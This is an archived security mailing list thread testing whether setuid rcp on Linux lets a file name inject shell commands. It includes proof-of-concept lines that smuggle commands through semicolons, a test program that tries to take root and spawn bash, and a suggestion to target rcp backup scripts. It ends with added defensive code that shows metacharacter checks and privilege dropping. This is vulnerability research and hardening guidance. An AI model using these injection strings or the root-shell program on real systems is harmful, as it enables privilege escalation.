Vulnerability Development mailing list archives
Re: possible rcp hole...
From: H D Moore <hdm () SECUREAUSTIN COM>
Date: Wed, 22 Nov 2000 00:05:32 -0600
On SuSE 6.4 rcp is not vulnerable. I replaced /bin/sh with this program:

--- ubersh.c ---
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid(), seteuid(), setreuid(), execl() */

/* Try to take uid 0, then hand over to an interactive bash so the
 * effective privileges at the moment of the system() call can be seen. */
int main (int argc, char **argv)
{
    (void)argc;
    (void)argv;
    setuid(0);
    seteuid(0);
    setreuid(0, 0);
    execl("/bin/bash", "uber shell", "-i", (char *)NULL);
    /* only reached if execl() fails */
    printf("exiting root shell...\n");
    return 0;
}
--------------

The rcp program executed my shell with:

$ rcp 'file1 file2;' 127.0.0.1

Which dropped me into the ubersh, where my privs were still that of my user account. I am pretty sure rcp drops privs before calling anything (only uses it for the port bindings), let alone system, or we would have heard something about this before.

This is still a cool hole if you can find some custom/scripted system that does rcp backups from user-writable directories. You could gain access as whatever user the backups ran as (likely to be privileged).

-HD
http://www.digitaldefense.net
http://www.digitaloffense.net

On Tuesday 21 November 2000 04:11 pm, Andrew Griffiths wrote:
> Here is a possible bug in rcp; since I think it calls system(). I haven't had much time to play with this, because exams are coming up. It is negated because system() calls /bin/cp which, with the newer versions of bash, drops its effective credentials...
>
> $ ls -alF `which rcp`
> -rwsr-xr-x 1 root root 14492 Jul 21 22:43 /usr/sbin/rcp
> $ cd /tmp
> $ echo bla > bob
> $ rcp 'bob bobalina; /usrt/bin/id;' 127.0.0.1
> uid=500(andrewg) gid=500(andrewg) groups=500(andrewg)
> sh: 127.0.0.1: command not found.
>
> Now doing a quick ltrace - it doesn't remove ; and ` and other fun stuff. This could probably be exploited, on older bash versions?
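The two messages above turn on the same point: a setuid program that hands a user-supplied file name to system() lets a space or a ';' in that name become a second command, and the only thing that saved rcp here is that privileges were already dropped. The program below is an added illustration written for this archive page, not code from the thread or from any rcp implementation. It shows the two defensive patterns a reviewer would ask for: reject shell metacharacters in any string that is going to reach a shell, and, better, avoid the shell entirely by dropping privileges and calling exec with an explicit argv. The demo assumes /bin/cp exists, and the file names it creates (one of them containing "file1 file2; id") are constructed for the example.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Characters a POSIX shell treats specially, plus whitespace (which is what
 * turned 'file1 file2;' into two arguments for rcp). Any of these in a string
 * passed to system() can alter the command that actually runs. */
static const char SHELL_META[] = " \t;|&`$<>()\n\"'\\*?[]{}~#";

/* Returns 1 if s contains a character that must not reach a shell, else 0. */
int has_shell_metachars(const char *s)
{
    for (; *s; s++)
        if (strchr(SHELL_META, (unsigned char)*s))
            return 1;
    return 0;
}

/* Permanently drop to the real uid/gid and verify the drop took effect.
 * Returns 0 on success, -1 if a call failed or root could be regained. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setgid(rgid) != 0)          /* group first: needs privilege to succeed */
        return -1;
    if (setuid(ruid) != 0)
        return -1;
    if (ruid != 0 && seteuid(0) == 0)   /* drop must be irrevocable */
        return -1;
    if (getuid() != ruid || geteuid() != ruid)
        return -1;
    return 0;
}

/* Copy src to dst with an explicit argv: no shell parses the names, so
 * metacharacters are just bytes in a file name. Privileges are dropped in the
 * child before exec. Returns cp's exit status, or -1 on failure. */
int copy_without_shell(const char *src, const char *dst)
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges() != 0)
            _exit(127);
        execl("/bin/cp", "cp", "--", src, dst, (char *)NULL);
        _exit(127);                 /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Constructed demo: a source file whose name would be split and then run as
 * a command under system(), copied safely via exec. Returns 1 on success. */
int copy_demo(void)
{
    char dir[] = "/tmp/rcpdemoXXXXXX";   /* constructed scratch directory */
    char src[256], dst[256];
    FILE *f;
    int ok;

    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(src, sizeof src, "%s/file1 file2; id", dir);
    snprintf(dst, sizeof dst, "%s/copy", dir);
    f = fopen(src, "w");
    if (f == NULL)
        return 0;
    fputs("hello\n", f);
    fclose(f);

    ok = (copy_without_shell(src, dst) == 0) && (access(dst, F_OK) == 0);

    unlink(src);
    unlink(dst);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("'file1 file2;' unsafe for a shell: %d\n", has_shell_metachars("file1 file2;"));
    printf("'plain_file.txt' unsafe for a shell: %d\n", has_shell_metachars("plain_file.txt"));
    printf("drop_privileges: %s\n", drop_privileges() == 0 ? "ok" : "FAILED");
    printf("copy via exec with metacharacter name: %s\n", copy_demo() ? "ok" : "FAILED");
    return 0;
}
```

Run as an ordinary user the privilege-drop check is a no-op that still verifies seteuid(0) is refused; run from a setuid-root binary it is the step whose absence would have made the rcp behaviour in the thread a real root hole. The metacharacter check is the fallback for code that cannot be moved off system(); the exec path is the fix that makes the question moot.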
Current thread:
- possible rcp hole... Andrew Griffiths (Nov 22)
- Re: possible rcp hole... Luciano Miguel Ferreira Rocha (Nov 23)
- Re: possible rcp hole... H D Moore (Nov 25)
- Re: possible rcp hole... Joe (Nov 27)